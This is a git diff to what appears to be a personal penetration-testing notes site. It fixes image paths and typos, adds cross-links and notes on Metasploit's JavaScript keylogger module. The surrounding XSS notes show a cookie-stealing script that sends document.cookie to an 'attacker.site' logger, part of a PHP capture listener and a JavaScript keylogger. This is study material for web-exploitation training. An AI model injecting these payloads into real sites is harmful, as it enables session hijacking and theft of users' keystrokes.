diff --git a/docs/cloning-a-site.md b/docs/cloning-a-site.md
index e0d841b849..b0b328e5db 100644
--- a/docs/cloning-a-site.md
+++ b/docs/cloning-a-site.md
@@ -8,7 +8,6 @@ tags:
   - phishing
   - tools
 ---
-
 # Tools for cloning a site
 
 [BeEF](beef.md).
diff --git a/docs/data-encoding.md b/docs/data-encoding.md
index 83600d1dea..e88ffc5440 100644
--- a/docs/data-encoding.md
+++ b/docs/data-encoding.md
@@ -288,14 +288,14 @@ parseInt("ohpe",36)
 
 It's one of the possible attacks that can be perform with unicode:
 
-![Visual spoofing attack](visual-spoofing-attack.png)
+![Visual spoofing attack](img/visual-spoofing-attack.png)
 
-![Visual spoofing attack](visual-spoofing-attack_02.png)
+![Visual spoofing attack](img/visual-spoofing-attack_02.png)
 
 
 A tool for generating visual spoofing attacks: [https://www.irongeek.com/homoglyph-attack-generator.php](https://www.irongeek.com/homoglyph-attack-generator.php)
 
-![Visual spoofing attack](visual-spoofing-attack_03.png)
+![Visual spoofing attack](img/visual-spoofing-attack_03.png)
 
 [Paper](https://www.irongeek.com/i.php?page=security/out-of-character-use-of-punycode-and-homoglyph-attacks-to-obfuscate-urls-for-phishing)
 
diff --git a/docs/ewpt-preparation.md b/docs/ewpt-preparation.md
index a9049bab63..078449d3f8 100644
--- a/docs/ewpt-preparation.md
+++ b/docs/ewpt-preparation.md
@@ -28,7 +28,7 @@ eWPTX
 
 | Module | Course name                             | My notes on HackingLife                                                             |
 | ------ | --------------------------------------- | ----------------------------------------------------------------------------------- |
-| 01     | Encoding and filtering                  |                                                                                     |
+| 01     | Encoding and filtering                  | - [Data encoding](data-encoding.md)<br>- [Input filtering](input-filtering.md)      |
 | 02     | Evasion Basics                          |                                                                                     |
 | 03     | Cross-Site Scripting                    | - [Cross Site Script vulnerabilities](webexploitation/cross-site-scripting-xss.md). |
 | 04     | Filter evasion and WAF Bypasssing       |                                                                                     |
diff --git a/docs/metasploit.md b/docs/metasploit.md
index 15d71e8d46..a588aec301 100644
--- a/docs/metasploit.md
+++ b/docs/metasploit.md
@@ -409,6 +409,9 @@ searchsploit nagios3
 
 Use this to enumerate users and brute force passwords in a smb service.
 
+### auxiliary/http_javascript_keylogger
+
+It creates the Javascript payload with a keylogger, which could be injected within the XSS vulnerable web page and automatically starts the listening server. To see how it works, set the DEMO option to true.
 
 ### post/windows/gather/hasdump 
 
diff --git a/docs/webexploitation/cross-site-scripting-xss.md b/docs/webexploitation/cross-site-scripting-xss.md
index 50c33f5595..497ccd181a 100644
--- a/docs/webexploitation/cross-site-scripting-xss.md
+++ b/docs/webexploitation/cross-site-scripting-xss.md
@@ -360,6 +360,8 @@ HTTPOnly forbids javaScript from accessing the cookies, for example, through the
 
 #### 2.1. Cross Site Tracing
 
+[OWASP Cross Site Tracing reference](https://owasp.org/www-community/attacks/Cross_Site_Tracing)
+
 Technique for bypassing HTTPOnly flag. Since scripting languages are blocked due to the use of HTTPOnly, this technique proposes to use the HTTP TRACE method.
 
 HTTP TRACE method is a method used for debugging, and it echoes back input requests to the user. So, if we send HTTP headers normally inaccessible to Javascript, we will be able to read them.
@@ -414,7 +416,7 @@ var i = new Image();
 i.src = "http://attacker.site/log.php?q="+document.cookie;
 </script>
 ```
-
+  
 Add that code to the injection endpoint that you detected in step 1. That code will save the cookie in a text file on the attacker site.
 
 Create a text file (log.php) for capturing the sent cookie in the attacker site:
@@ -490,7 +492,7 @@ Example of C.php Listerner recording hosts, time of logging, IP addresses:
 <?php
 error_reporting(0); # Turn off all error reporting
 
-function getVictimIP()= { ... } # Function tha returns victim IP
+function getVictimIP()= { ... } # Function that returns victim IP
 function collect() {
 $file= '_cc_.txt'; # The log file
 $date=date("l dS of F Y h:i:s A");
@@ -553,13 +555,15 @@ https://victim.site/XSS/reflected.php?name=%3Cscript%3Edocument.body.innerHTML=%
 
 - *Persistent defacements* modify permanently the content hosted on the target web application. They are basically abusing Stored XSS.
 
+[Tools for cloning a website](../cloning-a-site.md)
+
 ### 4. Keyloggers
 
 A tool: [http_javascript_keylogger](https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/capture/http_javascript_keylogger.rb). See also [my notes on that metasploit module](../metasploit.md).
 
 Event logger from [BeEF](../beef.md).
 
-The following code.
+The following code:
 
 ```js
 var keys = "" //Where > where to store the key strokes
@@ -583,6 +587,9 @@ window.setInterval(function()) {
 
 ```
 
+
+Additionally, we have the [metasploit](../metasploit.md) module auxiliary(http_javascript_keylogger), an advance version of the previous javascript code. It creates the Javascript payload with a keylogger, which could be injected within the vulnerable web page and automatically starts the listening server. To see how it works, set the DEMO option to true.
+
 ### 5. Network attacks
 
 A way to enter within intranet networks is by passing through HTTP traffic that, despite other protocols, is usually allowed to pass by firewalls.
diff --git a/mkdocs.yml b/mkdocs.yml
index 1a7f21e7cb..965deb20e8 100644
--- a/mkdocs.yml
+++ b/mkdocs.yml
@@ -135,6 +135,7 @@ nav:
       - pyinstaller: pyinstaller.md
       - pypykatz: pypykatz.md
       - rdesktop: rdesktop.md
+      - regex: regex.md
       - regshot: regshot.md
       - responder.py: responder.md
       - rpcclient: rpcclient.md